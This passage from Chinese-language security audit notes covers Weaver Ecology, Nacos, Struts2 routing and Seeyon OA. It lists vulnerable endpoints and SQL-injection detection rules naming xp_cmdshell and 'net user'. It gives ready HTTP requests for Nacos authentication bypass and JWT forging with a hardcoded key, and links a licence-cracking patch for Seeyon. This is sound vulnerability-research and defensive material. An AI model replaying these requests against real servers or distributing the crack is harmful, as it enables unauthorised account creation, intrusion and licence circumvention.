115 |     <rule>[^a-zA-Z]count\(|[^a-zA-Z]chr\(|[^a-zA-Z]mid\(|[^a-zA-Z]char[\s+\(]|[^a-zA-Z]net[^a-zA-Z]user[^a-zA-Z]|[^a-zA-Z]xp_cmdshell[^a-zA-Z]|\W/add\W|[^a-zA-Z]master\.dbo\.xp_cmdshell|net[^a-zA-Z]localgroup[^a-zA-Z]administrators|DBMS_PIPE\.|[^a-zA-Z]len\s*\(|[^a-zA-Z]left\s*\(|[^a-zA-Z]right\s*\(|str(c|ing)?\s*\(|ascii\s*\(|UNION([^a-zA-Z]ALL[^a-zA-Z])?SELECT[^a-zA-Z]NULL|[a-zA-Z0-9_\-]+\s*=\s*0x(2D|3[0-9]|4[1-F1-f]|5[1-A1-a]|6[1-F1-f]|7[1-A][1-a])|UTL_HTTP\s*\(|MAKE_SET\s*\(|ELTs*\(|IIF\s*\(|(PG_)?SLEEP\s*\(|DBMS_LOCK\s*\.|USER_LOCK\s*\.|[LR]LIKE\s*\(|CONCAT(_WS)?\s*\(|GREATEST\s*\(|IF(NULL)?\s*\(|EXTRACTVALUE\s*\(|UPDATEXML\s*\(|WAITFOR\s*DELAY|ANALYSE\s*\(|UNION\s+(ALL\s+)?SELECT</rule>
116 |     <!--typical SQL injection detect-->
117 |     <rule>\w*((\%27))((\%6F)|(\%4F))((\%72)|(\%52))</rule>
118 |     <rule>((\%27)|('))union</rule>
119 |     <rule>substrb\(</rule>
120 | </rules>
121 | ```
122 | 
123 |     
124 | ### (6) 补丁 ###
125 | 官方网址: https://www.weaver.com.cn/cs/securityDownload.html?src=cn  
126 | 老补丁下载方式: 根据官网中补丁发布的时间和版本，拼接成`日期_版本.zip?v=日期03`，访问url进行下载，如：  
127 | https://www.weaver.com.cn/cs/package/Ecology_security_20220731_v10.52.zip?v=2022073103  
128 | 补丁解压密码
129 | ```
130 | v10.39-46: Weaver@Ecology201205
131 | <v10.38: 未知
132 | old version: Weaver#2012!@#
133 | ``` 
134 | 补丁安装: 补丁解压后，替换ecology文件夹中的对应内容
135 | 
136 | ### (7) 历史漏洞 ###
137 | ```
138 | (1) BeanShell RCE (2019.09.17修复)
139 | POST /weaver/bsh.servlet.BshServlet
140 | 
141 | (2) Soap XStream RCE: 
142 | POST /services%20/WorkflowServiceXml
143 | Ref: https://www.anquanke.com/post/id/239865
144 | 
145 | (3) 前台Zip文件上传
146 | POST /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp
147 | GET /cloudstore/xxx.jsp
148 | 
149 | (4) 文件上传
150 | POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image
151 | Ref: https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483666&idx=1&sn=e70efe98c064e0f1df986e2b65c1a608&chksm=c1018af5f67603e39ce4d6e9375875e63e7b80633a1f99959f8d4652193ac3734765a99099ea&mpshare=1&scene=23&srcid=0414cqXy50udQOy19LYOMega&sharer_sharetime=1618332600979&sharer_shareid=d15208c7b27f111e2fe465f389ab6fac#rd
152 | 
153 | (5) 文件上传
154 | POST /weaver/weaver.workflow.exceldesign.ExcelUploadServlet?method=uploadFile&savefile=pass.jsp
155 | Ref:https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483674&idx=1&sn=ce1c56a670587df0a33201a62a4b6e2d&chksm=c1018afdf67603eb15bea96e668bc0279b63f241654beb000da3c7e7333d8545c4c3217d0576&scene=178&cur_album_id=1824092566640705544#rd
156 | 
157 | (6) 数据库配置文件读取 (2019.10.24修复)
158 | POST /mobile/DBconfigReader.jsp
159 | 
160 | (7) Oracle注入 (2019.10.10修复)
161 | /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333
162 | 
163 | (8) 日志泄漏
164 | /hrm/kq/gethrmkq.jsp?filename=1
165 | 
166 | (9) 文件上传 （2022.06.18修复）
167 | POST /workrelate/plan/util/uploaderOperate.jsp
168 | POST /OfficeServer
169 | 
170 | (10) 文件上传
171 | POST /page/exportImport/uploadOperation.jsp
172 | 
173 | (11) Cookie泄露
174 | POST /mobile/plugin/VerifyQuickLogin.jsp
175 | 
176 | (12) SQL注入
177 | GET /api/ec/dev/locale/getLabelByModule
178 | 
179 | (13) 代码执行
180 | POST /api/integration/workflowflow/getInterfaceRegisterCustomOperation
181 | 
182 | (14) 文件读取
183 | GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties
184 | 
185 | (15) SQL注入
186 | /cpt/manage/validate.jsp
187 | ```
188 | 


--------------------------------------------------------------------------------
/Java_OA/NacosAudit.md:
--------------------------------------------------------------------------------
  1 | ## 环境搭建
  2 | 
  3 | 官方网址：https://github.com/alibaba/nacos
  4 | 
  5 | github上下载server版，进入bin目录，执行如下命令（nacos的运行环境是java1.8）。windows平台运行`.cmd`文件
  6 | 
  7 | ```
  8 | sh startup.sh -m standalone
  9 | ```
 10 | 
 11 | 然后访问
 12 | 
 13 | ```
 14 | http://ip:8848/nacos/#/login
 15 | ```
 16 | 
 17 | 
 18 | ## Nacos简介
 19 | 
 20 | Nacos（Dynamic Naming and Configuration Service）用于动态服务发现、配置和管理，构建云原生应用和微服务平台。Nacos支持各类服务，如Dubbo/gRPC服务、Spring Cloud RESTful服务、Kubernetes服务。
 21 | 
 22 | Nacos想要只用一个程序包就可以快速启动Nacos。由于Nacos需要存储数据，在集群模式下就需要考虑如何让节点之间的数据保持一致。这种一致性算法在工业生产中用的最多的就是Raft协议。另外，还采用了最终一致性协议Distro。
 23 | 
 24 | Nacos官方文档参考：https://www.yuque.com/nacos/ebook/ynstox
 25 | 
 26 | 常见端口如下。
 27 | 
 28 | | 端口 | 描述                                                 |
 29 | | ---- | ---------------------------------------------------- |
 30 | | 8848 | 主端口，客户端、控制台及OpenAPI所使用的HTTP端口      |
 31 | | 9848 | 客户端gRPC请求服务端端口，用于客户端向服务端发起请求 |
 32 | | 9849 | 服务端gRPC请求服务端端口，用于服务间同步等           |
 33 | | 7848 | Jraft请求服务端端口                                  |
 34 | 
 35 | 
 36 | 
 37 | ## 框架结构
 38 | 
 39 | 1.4.0版本中目录结构包含`api、auth、client、cmdb、common、config、consistency、console、core、distribution、istio、naming、sys`等文件夹。整体框架采用Springboot
 40 | 
 41 | 首先看core的核心文件
 42 | 
 43 | ```
 44 | com.alibaba.nacos.core
 45 |   |- auth
 46 |   |- cluster
 47 |   |- code
 48 |   |- controller /v1/core/ops、/v1/core/cluster
 49 |   |- distributed
 50 |   |- exception
 51 |   |- monitor
 52 |   |- storage
 53 |   |- utils
 54 | ```
 55 | 
 56 | ### 权限校验
 57 | 
 58 | 在auth中通过AuthConfig给所有的路由添加了一个`AuthFilter`
 59 | 
 60 | ```java
 61 | @Configuration
 62 | public class AuthConfig {
 63 |     
 64 |     @Bean
 65 |     public FilterRegistrationBean authFilterRegistration() {
 66 |         FilterRegistrationBean<AuthFilter> registration = new FilterRegistrationBean<>();
 67 |         registration.setFilter(authFilter());
 68 |         registration.addUrlPatterns("/*");
 69 |         registration.setName("authFilter");
 70 |         registration.setOrder(6);
 71 |         
 72 |         return registration;
 73 |     }
 74 |     
 75 |     @Bean
 76 |     public AuthFilter authFilter() {
 77 |         return new AuthFilter();
 78 |     }
 79 | }
 80 | ```
 81 | 
 82 | #### 1.4.0 版本权限校验
 83 | 
 84 | 跟进AuthFilter。先是从`conf/application.properties`中读取`nacos.core.auth.enabled`的值，该值默认为false。
 85 | 
 86 | ```java
 87 | public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
 88 |             throws IOException, ServletException {
 89 |         
 90 |         if (!authConfigs.isAuthEnabled()) { //读取System.getProperty("nacos.core.auth.enabled");的值，如果没有值默认返回false。
 91 |             chain.doFilter(request, response); 
 92 |             return;
 93 |         }
 94 |         
 95 |         String userAgent = WebUtils.getUserAgent(req); // 获取头部User-Agent
 96 |         
 97 |         if (StringUtils.startsWith(userAgent, Constants.NACOS_SERVER_HEADER)) { // 如果User-Agent的值为Nacos-Server
 98 |             chain.doFilter(request, response); 
 99 |             return;
100 |         }
101 |         
102 |         try {
103 |             Method method = methodsCache.getMethod(req);
104 |             if (method == null) {
105 |                 chain.doFilter(request, response);
106 |                 return;
107 |             }
108 |             
109 |             if (method.isAnnotationPresent(Secured.class) && authConfigs.isAuthEnabled()) {
110 |                 ...
111 |                 authManager.auth(new Permission(resource, action), authManager.login(req));
112 |                 
113 |             }
114 |             chain.doFilter(request, response);
115 |         } ...
116 |     }
117 | ```
118 | 
119 | 开发者一般如果要开启权限校验，会将`nacos.core.auth.enabled`的值改为true。
120 | 
121 | ```java
122 | if (StringUtils.startsWith(userAgent, Constants.NACOS_SERVER_HEADER)) { 
123 |     chain.doFilter(request, response); 
124 |     return;
125 | }
126 | ```
127 | 
128 | 如果User-Agent的值为`Nacos-Server`即可绕过所有的校验。这也是CVE-2021-29441的原理。
129 | 
130 | #### 1.4.1 版本权限校验
131 | 
132 | 后来在1.4.1版本中，修复的代码如下。
133 | 
134 | ```java
135 | if (authConfigs.isEnableUserAgentAuthWhite()) {
136 |     String userAgent = WebUtils.getUserAgent(req);
137 |     if (StringUtils.startsWith(userAgent, Constants.NACOS_SERVER_HEADER)) {
138 |         chain.doFilter(request, response);
139 |         return;
140 |     }
141 | }else if (StringUtils.isNotBlank(authConfigs.getServerIdentityKey()) && StringUtils.isNotBlank(authConfigs.getServerIdentityValue())) {
142 |     String serverIdentity = req.getHeader(authConfigs.getServerIdentityKey());
143 |     if (authConfigs.getServerIdentityValue().equals(serverIdentity)) {
144 |         chain.doFilter(request, response);
145 |         return;
146 |     }
147 | } else { /*sendError */
148 |     return;
149 | }
150 | ```
151 | 
152 | 首先是`conf/application.properties`增加了属性`nacos.core.auth.enable.userAgentAuthWhite`，默认值为true。相当于又增加了一个头部校验的开关。如果这个值开发者改为false。就不会被User-Agent绕过校验。另外，当值设为false时，nacos也为开发者设置了`identity`键值对用于进一步校验。键key相当于一个新设置的Header，当该Header的值为value的值时即通过校验。
153 | 
154 | ```
155 | ### Since 1.4.1, worked when nacos.core.auth.enabled=true and nacos.core.auth.enable.userAgentAuthWhite=false.
156 | ### The two properties is the white list for auth and used by identity the request from other server.
157 | nacos.core.auth.server.identity.key=
158 | nacos.core.auth.server.identity.value=
159 | ```
160 | 
161 | 但是在后续的版本中，如2.2.0版本`identity`设置了默认值
162 | 
163 | ```
164 | nacos.core.auth.server.identity.key=serverIdentity
165 | nacos.core.auth.server.identity.value=security
166 | ```
167 | 
168 | 此时就出现了硬编码绕过权限校验的漏洞
169 | 
170 | ```
171 | POST /nacos/v1/auth/users?username=admin&password=123
172 | Host: ip
173 | serverIdentity: security
174 | ```
175 | 
176 | 后续的修复和JWT Token权限校验漏洞的修复方式一样，都是去掉了硬编码，设为了空。并且要求用户进行设置，否则无法启动。
177 | 
178 | 
179 | 
180 | ## 历史漏洞
181 | 
182 | | 漏洞编号             | 漏洞类型                 | 影响范围               |
183 | | -------------------- | ------------------------ | ---------------------- |
184 | | CVE-2021-29441       | User-Agent权限绕过       | <1.4.2                 |
185 | | CVE-2021-29441的绕过 | url权限绕过              | <1.4.2                 |
186 | | QVD-2023-6271        | accessToken认证绕过      | <=2.2.0                |
187 | | CVE-2021-29441的绕过 | serverIdentity硬编码绕过 | <=2.2.0                |
188 | | 无                  | Hessian反序列化漏洞      | 2.0.0 <= Nacos < 2.2.3 |
189 | 
190 | 
191 | 
192 | ### CVE-2021-29441
193 | 
194 | 在框架结构的1.4.0版本权限校验中说到如果User-Agent的值为`Nacos-Server`即可绕过所有的校验。结合后台Controller能够造成的威胁，可以创造新用户
195 | 
196 | ```
197 | POST /nacos/v1/auth/users?username=123&password=123 HTTP/1.1
198 | Host: ip
199 | User-Agent: Nacos-Server
200 | ```
201 | 
202 | 对应的UserController代码如下
203 | 
204 | ```java
205 | @RestController("user")
206 | @RequestMapping({"/v1/auth", "/v1/auth/users"})
207 | public class UserController {
208 |     @Secured(resource = NacosAuthConfig.CONSOLE_RESOURCE_NAME_PREFIX + "users", action = ActionTypes.WRITE)
209 |     @PostMapping
210 |     public Object createUser(@RequestParam String username, @RequestParam String password) {
211 |         
212 |         User user = userDetailsService.getUserFromDatabase(username);
213 |         if (user != null) {
214 |             throw new IllegalArgumentException("user '" + username + "' already exist!");
215 |         }
216 |         userDetailsService.createUser(username, PasswordEncoderUtil.encode(password));
217 |         return new RestResult<>(200, "create user ok!");
218 |     }
219 | }
220 | ```
221 | 
222 | 
223 | 
224 | ### JWT Token权限校验
225 | 
226 | 另外，`conf/application.properties`中还有一个硬编码的属性。
227 | 
228 | ```
229 | nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
230 | ```
231 | 
232 | 如果采用默认的用户名密码登陆，请求包如下
233 | 
234 | ```
235 | POST /nacos/v1/auth/users/login HTTP/1.1
236 | Host: ip
237 | Upgrade-Insecure-Requests: 1
238 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
239 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
240 | Accept-Encoding: gzip, deflate
241 | Accept-Language: zh-CN,zh;q=0.9
242 | Content-Type: application/x-www-form-urlencoded
243 | Connection: close
244 | Content-Length: 29
245 | 
246 | username=nacos&password=nacos
247 | ```
248 | 
249 | 会发现回显如下
250 | 
251 | ```
252 | HTTP/1.1 200 
253 | Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwNTA2NzMwN30.ffm1aAW-Lkn0KbVOFO5IWUvRrh8fJblLVf4Jwf4Lcbo
254 | Content-Type: application/json;charset=UTF-8
255 | Date: Fri, 12 Jan 2024 08:48:27 GMT
256 | Connection: close
257 | Content-Length: 162
258 | 
259 | {"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwNTA2NzMwN30.ffm1aAW-Lkn0KbVOFO5IWUvRrh8fJblLVf4Jwf4Lcbo","tokenTtl":18000,"globalAdmin":true}
260 | ```
261 | 
262 | 放到`https://jwt.io/`下解密。exp可以用`https://tool.lu/timestamp/`unix时间戳生成。
263 | 
264 | ```
265 | {
266 |   "sub": "nacos",
267 |   "exp": 1705067307
268 | }
269 | ```
270 | 
271 | 根据`security.key`的硬编码值`SecretKey012345678901234567890123456789012345678901234567890123456789`，和一个晚于当前时间的时间戳。生成base64编码。
272 | 
273 | ![image-20240112170234236](/images/image-20240112170234236.png)
274 | 
275 | 放入到请求包中可随意登陆
276 | 
277 | ```
278 | POST /nacos/v1/auth/users/login HTTP/1.1
279 | Host: ip
280 | Upgrade-Insecure-Requests: 1
281 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
282 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
283 | Accept-Encoding: gzip, deflate
284 | Accept-Language: zh-CN,zh;q=0.9
285 | Content-Type: application/x-www-form-urlencoded
286 | Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwNzcyODIyN30.Dx2F0oNSEbWTtxszvifb6lMsqwuCY9S2VQilA03ejCg
287 | Connection: close
288 | Content-Length: 25
289 | 
290 | username=111&password=111
291 | ```
292 | 
293 | 那么从代码中，这个key到底是怎么用的？
294 | 
295 | ```java
296 |     @PostMapping("/login")
297 |     public Object login(@RequestParam String username, @RequestParam String password, HttpServletResponse response, HttpServletRequest request) throws AccessException {
298 |         
299 |         if (AuthSystemTypes.NACOS.name().equalsIgnoreCase(authConfigs.getNacosAuthSystemType())) {
300 |             NacosUser user = (NacosUser) authManager.login(request); // 核心处理
301 |             
302 |             response.addHeader(NacosAuthConfig.AUTHORIZATION_HEADER, NacosAuthConfig.TOKEN_PREFIX + user.getToken()); //Response添加头部 Authorization: Bearer + userToken
303 |             ...
304 |         }
305 |     }
306 | 
307 | public User login(Object request) throws AccessException {
308 |     String token = resolveToken(req);
309 |     tokenManager.validateToken(token);
310 | }
311 | ```
312 | 
313 | 核心login的处理主要是两步，获取token，校验token。
314 | 
315 | 获取token。
316 | 
317 | ```java
318 |     private String resolveToken(HttpServletRequest request) throws AccessException {
319 |         String bearerToken = request.getHeader(NacosAuthConfig.AUTHORIZATION_HEADER); // Authorization
320 |         if (StringUtils.isNotBlank(bearerToken) && bearerToken.startsWith(TOKEN_PREFIX)) { // Bearer
321 |             return bearerToken.substring(7); // 如果Bearer后不为空，返回Bearer后的内容
322 |         }
323 |         bearerToken = request.getParameter(Constants.ACCESS_TOKEN); // 获取accessToken参数值
324 |         if (StringUtils.isBlank(bearerToken)) { // 如果accessToken是空，获取用户名密码
325 |             String userName = request.getParameter("username");
326 |             String password = request.getParameter("password");
327 |             bearerToken = resolveTokenFromUser(userName, password);
328 |         }
329 |         
330 |         return bearerToken; // 否则返回accessToken的值
331 |     }
332 | ```
333 | 
334 | 校验token。可以看到获取了`security.key`的值并进行base64解密，然后将其设定为JWT的key。这也是在生成时需要勾选base64的原因。
335 | 
336 | ```java
337 |     public void validateToken(String token) {
338 |         Jwts.parserBuilder().setSigningKey(authConfigs.getSecretKeyBytes()).build().parseClaimsJws(token);
339 |     }
340 | 
341 |     public byte[] getSecretKeyBytes() {
342 |         if (secretKeyBytes == null) {
343 |             secretKeyBytes = Decoders.BASE64.decode(secretKey); 
344 |         }
345 |         return secretKeyBytes;
346 |     }
347 | 
348 |     @Value("${nacos.core.auth.default.token.secret.key:}")
349 |     private String secretKey;
350 | ```
351 | 
352 | 顺便看一眼`JwtTokenManager.createToken()`中Token的生成代码
353 | 
354 | ```java
355 |     public String createToken(String userName) {
356 |         
357 |         long now = System.currentTimeMillis();
358 |         
359 |         Date validity;
360 |         validity = new Date(now + authConfigs.getTokenValidityInSeconds() * 1000L);
361 |         
362 |         Claims claims = Jwts.claims().setSubject(userName);
363 |         return Jwts.builder().setClaims(claims).setExpiration(validity)
364 |                 .signWith(Keys.hmacShaKeyFor(authConfigs.getSecretKeyBytes()), SignatureAlgorithm.HS256).compact();
365 |     }
366 | ```
367 | 
368 | 后来在补丁修复中，将`nacos.core.auth.default.token.secret.key`设为了空，并且需要用户自行填充，否则无法启动节点。
369 | 
370 | 
371 | 
372 | ### Hessian 反序列化漏洞
373 | 
374 | 网上的分析文章很多。
375 | 
376 | 后续的修复：https://github.com/alibaba/nacos/pull/10542/files 。 官方采用了白名单的方式限制了反序列化的类。
377 | 


--------------------------------------------------------------------------------
/Java_OA/Route_Struts2.md:
--------------------------------------------------------------------------------
  1 | Struts2常见的配置文件包括：`struts.xml、struts-config.xml、struts.properties`等。Struts2首先要在`web.xml`中进行配置。
  2 | 
  3 | ## web.xml
  4 | 
  5 | ```xml
  6 | <filter>
  7 | 	<filter-name>struts2</filter-name>
  8 | 	<filter-class>
  9 | org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter
 10 | 	</filter-class>
 11 | </filter>
 12 | <filter-mapping>
 13 | 	<filter-name>struts2</filter-name>
 14 | 	<url-pattern>/*</url-pattern>
 15 | </filter-mapping>
 16 | ```
 17 | 
 18 | **`<url-pattern>`** 还有一种常见的写法如下。
 19 | 
 20 | ```xml
 21 | <url-pattern>.action</url-pattern>
 22 | ```
 23 | 
 24 | 当值为`/*`时，所有的路由都由Struts2进行解析，此时路由扩展名默认为`.action`。当值为`.action`时，只解析特定`.action`后缀的路由。
 25 | 
 26 | 需要注意，Struts2扩展名默认为`.action`，Struts1扩展名默认为`.do`。
 27 | 
 28 | **`<filter-class>`**
 29 | 
 30 | 另外，如果是Struts版本`<2.1.3`，`<filter-class>`标签的值如下。`2.1.3`之后的版本值是`StrutsPrepareAndExecuteFilter`
 31 | 
 32 | ```xml
 33 | <filter-class>
 34 | 	org.apache.struts2.dispatcher.FilterDispatcher
 35 | </filter-class>
 36 | ```
 37 | 
 38 | **`init-param`属性**
 39 | 
 40 | 如果filter标签添加了如下的`init-param`属性，那么扩展名为`.json`。和在`properties`文件中添加配置信息`struts.action.extension=json`效果一样。
 41 | 
 42 | ```xml
 43 | <filter>
 44 |     <filter-name>struts2</filter-name>
 45 |     <filter-class> org.apache.struts2.dispatcher.FilterDispatcher </filter-class>
 46 |     <init-param>
 47 |         <param-name>struts.action.extension</param-name>
 48 |         <param-value>json</param-value>
 49 |     </init-param>
 50 | </filter>
 51 | ```
 52 | 
 53 | 
 54 | 
 55 | ## struts.xml
 56 | 
 57 | `struts.xml`用于开发配置，可用于覆盖默认配置`default.properties`。`struts.xml`包含`action、result、interceptor、constant、package、global-results`等配置。大概的配置文件形式如下
 58 | 
 59 | ```xml
 60 | <struts>
 61 |    <constant name="struts.devMode" value="true" />
 62 |    <package name="helloworld" extends="struts-default">
 63 |       <action name="hello" class="xx.HelloWorldAction" method="execute">
 64 |             <result name="success">/HelloWorld.jsp</result>
 65 |       </action>
 66 |    </package>
 67 | </struts>
 68 | ```
 69 | 
 70 | 
 71 | 
 72 | ### constant
 73 | 
 74 | 常量配置定义了很多全局的配置，例如文件上传的大小限制、编码方式等。如下几个配置和路由相关。配置扩展名为`action`。用Convention插件，指定了只在类路径下查找结尾为`Action`的类。这样就无需在配置文件中配置每个`Action`。
 75 | 
 76 | ```xml
 77 | <struts>
 78 |   <!--启用Struts2的动态方法调用功能，访问方式为action!method。允许在Actin中直接调用方法而不需要在struts.xml中配置-->
 79 |   <constant name="struts.enable.DynamicMethodInvocation" value="true"/>
 80 |   <!--指定使用 Spring 框架作为对象工厂。集成Struts2和Spring-->
 81 |   <constant name="struts.objectFactory" value="spring" />
 82 |   <!--请求Action的url后缀为.action-->
 83 |   <constant name="struts.action.extension" value="action, do"/>
 84 | 	<!--Action的类名以Action为后缀-->
 85 | 	<constant name="struts.convention.action.suffix" value="Action" />
 86 | 	<!--Action中没有@Action注解也创建映射-->
 87 | 	<constant name="struts.convention.action.mapAllMatches" value="true" />
 88 |   <!--配置查找Action类的包定位器，只在名为action的包及其子包中查找Action类-->
 89 | 	<constant name="struts.convention.package.locators" value="action" />
 90 | </struts>
 91 | ```
 92 | 
 93 | ### package
 94 | 
 95 | `package`标签声明了不同的包，将组件进行模块化。示例如下。只有name属性是必须的，作为package的唯一标识。`extends`代表继承某个package的所有配置。struts最基础的package是`extends="struts-default"`。`namespace`是Actions的唯一命名空间，也是该模块的**根路由**。
 96 | 
 97 | ```xml
 98 | <package name="login-package" extends="itc-default" namespace="/">
 99 |   <action name="login_*" class="loginAction" method="{1}">
100 |     <result name="input">/pages/login/login.jsp</result>
101 |   </action>
102 | </package>
103 | ```
104 | 
105 | **PS：有的`namespace`的值可能为`/a`，那么该package下的所有路由前缀都要加上`/a`**
106 | 
107 | 可以看到上述packge继承自`itc-default`，`itc-default`内容如下，作为基础包定义了全局的拦截器、异常跳转等内容。
108 | 
109 | ```xml
110 | <package name="itc-default" extends="struts-default">
111 | 		<interceptors>
112 | 			<interceptor-stack name="myStack">
113 | 				<!--必须配置默认拦截器否则action表单中的参数将为null-->
114 | 				<interceptor-ref name="defaultStack" />
115 | 			</interceptor-stack>
116 | 			<interceptor name="interceptor" class="com.dahua.dssc.common.aop.Interceptor" />
117 | 		</interceptors>
118 | 		<!--定义全局异常跳转（PS:global-results必须在global-exception-mappings之前定义）-->
119 | 		<global-results>
120 | 			<result name="403Error">/common/403.jsp</result>
121 | 			<result name="500Error">/common/500.jsp</result>
122 | 			<result name="exception">/common/exception.jsp</result>
123 | 			<result name="timeout">/common/timeout.jsp</result>
124 | 		</global-results>
125 | 		<!--指定全局异常-->
126 | 		<global-exception-mappings>
127 | 			<exception-mapping result="exception" exception="java.lang.Exception" />
128 | 		</global-exception-mappings>
129 | 	</package>
130 | ```
131 | 
132 | 另外，如果模块过多，Struts2配置时一般将配置文件拆分成多个xml文件，将`struts.xml`作为所有xml文件的入口，如下。具体的上述配置就要在`struts.xml`中的引入的某个xml中查看。
133 | 
134 | ```xml
135 | <struts>
136 | 	<include file="struts/struts-base.xml" />
137 | 	<include file="struts/struts-core.xml" />
138 | 	...
139 | </struts>
140 | ```
141 | 
142 | ### action
143 | 
144 | 每个url对应了一个特定的Action。Action有三种实现方式
145 | 
146 | ```java
147 | public class TestAction{
148 | 	public String login() throws Exception { // 包含一个无参数方法返回String或Result对象
149 |       return "success";
150 |    }
151 | }
152 | 
153 | public class TestAction implements Action{
154 |   @Override
155 |   public String execute() throws Exception {...} // 实现Action接口重写execute方法
156 | }
157 | 
158 | public class TestAction extends ActionSupport{ 
159 |   public String list() { // 实现ActionSupport接口，不用重写execute方法
160 |     return "list";
161 |   }
162 | }
163 | ```
164 | 
165 | 这些定义的Action配置在`struts.xml`中也有三种形式
166 | 
167 | 1是将要调用的Action和方法都配置。2是用通配符`*`替换Action的名字或方法名。3是动态调用，只需要在`struts.xml`中配置`DynamicMethodInvocation`为true。就可以通过`action!method`的形式来调用
168 | 
169 | ```xml
170 | # 1
171 | <action name="list" class="com.action.TestAction" method="list" />
172 |   
173 | # 2
174 | <action name="login_*" class="loginAction" method="{1}">
175 |   <result name="input">/pages/login/login.jsp</result>
176 | </action>
177 | 
178 | <action name="*_*" class="{1}Action" method="{2}">
179 | 	<result name="j_{1}_{2}" type="json">
180 | 		<param name="root">returnMessage</param>
181 | 	</result>
182 | </action>
183 | 
184 | <action name="/edit*" class="org.apache.struts.webapp.example.Edit{1}Action">
185 |     <result name="failure">/mainMenu.jsp</result>
186 |     <result>{1}.jsp</result>
187 | </action>
188 | 
189 | <package name="default" namespace="/" extends="struts-default">
190 |   <global-allowed-methods>login,register</global-allowed-methods>
191 |   <action name="user_*" class="action.TestAction" method="{1}">
192 |     <result name="login">/success.jsp</result>
193 |   </action>
194 | </package>
195 | 
196 | # 3
197 | <action name="ccsAction!*" class="ccsShareAction" method="{1}"></action>
198 | ```
199 | 
200 | 另外，还有个需要注意的地方。`class`的值可以省略的，如果省略了默认为`com.opensymphony.xwork2.ActionSupport`类。以如下的案例为例，实际访问的就是result标签中的jsp文件。
201 | 
202 | ```xml
203 | <action name="dishConfig">
204 | 	<result>/modules/ccs/dishConfig.jsp</result>
205 | </action>
206 | ```
207 | 
208 | 关于正则通配符的用法可以参考官网：https://struts.apache.org/core-developers/wildcard-mappings.html
209 | 
210 | 


--------------------------------------------------------------------------------
/Java_OA/SeeyonAudit.md:
--------------------------------------------------------------------------------
  1 | # Seeyon致远OA
  2 | 
  3 | ## 环境安装
  4 | 
  5 | *   （1）安装mysql数据库（针对A8版本）。创建一个新的数据库，字符集设置为UTF-8。如果是A6版本，如
  6 |     `A6v6.1、A6v6.1sp1、A6v6.1sp2`，默认使用内嵌在安装包中的`postgresql`作为数据库，无需单独安装
  7 | *   （2）获取安装文件。`Seeyonxxx.zip`（安装包）、`jwycbjnoyees.jar`（破解补丁）
  8 | *   （3）在安装包中点击要安装版本`.bat`文件，如`SeeyonA8-1Install.bat`
  9 | *   （4）按照弹出的安装程序确认安装路径、配置数据库等（安装过程需要断网，否则检测到不是最新版无法进行下一步）。如果是A6版本，到数据库配置阶段可以修改`postgres`用户的密码。另外，针对A6版本，`postgresql`安装完成后不会设置`Windows`服务项，重启机器后再次启动会比较麻烦，可使用如下命令注册一个名为`pgsql`的服务项。后续可在`Windows`服务管理里启停`postgresql`服务
 10 | 
 11 | ```text-plain
 12 | cd C:\Seeyon\A6V6.1SP2\pgsql9.2.5\bin pg_ctl.exe register -N "pgsql" -D "C:\Seeyon\A6\A6V6.1SP2\pgsql9.2.5\data"
 13 | ```
 14 | 
 15 | *   （5）安装最后一步是账号密码设置。A6-A8.0版本默认设置`system`账户的密码。A8.1版本可定义管理员账号、密码、普通用户初始密码、S1 Agent密码。
 16 | *   （6）安装破解补丁。如果服务已经启动，需要先关闭服务。首先备份安装目录`A6\ApacheJetspeed\webapps\seeyon\WEB-INF\lib`下的`jwycbjnoyees.jar`文件，然后将其替换成补丁文件后重启服务。补丁文件下载（此补丁针对A8.1）：https://github.com/ax1sX/SecurityList/blob/main/Java_OA/jwycbjnoyees.jar
 17 | *   （7）服务启动。A6在确保postgresql数据库服务是启动的状态下，点击“致远服务”图标来启动服务。A8是通过agent+server的形式来部署的。所以需要先启动`S1 Agent`，通过双击`Seeyon\A8\S1\start.bat`或点击`SeeyonS1Agent`图标都可以实现。然后再点击“致远服务”图标（等效于`/S1/client/clent.exe`），在其“服务启动配置”中添加Agent。![致远服务部署Agent](https://github.com/ax1sX/SecurityList/blob/main/images/%E8%87%B4%E8%BF%9C%E6%9C%8D%E5%8A%A1%E9%85%8D%E7%BD%AEAgent.png)
 18 | *   （8）默认端口是80，可以在“致远服务”的“服务启动配置”中点击Agent的配置选项，对HTTP端口和JVM属性进行更改。想要对致远进行调试，可以在修改`/ApacheJetspeed/bin/catalina_custom.bat`文件，添加如下内容。
 19 | 
 20 | ```
 21 | set JAVA_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005"
 22 | ```
 23 | *   （9）访问`http://127.0.0.1:8085/seeyon/main.do`
 24 | *   （10）版本信息探测。http://ip:port/mobile_portal/api/verification/checkEnv
 25 | 
 26 | ## 架构分析
 27 | 
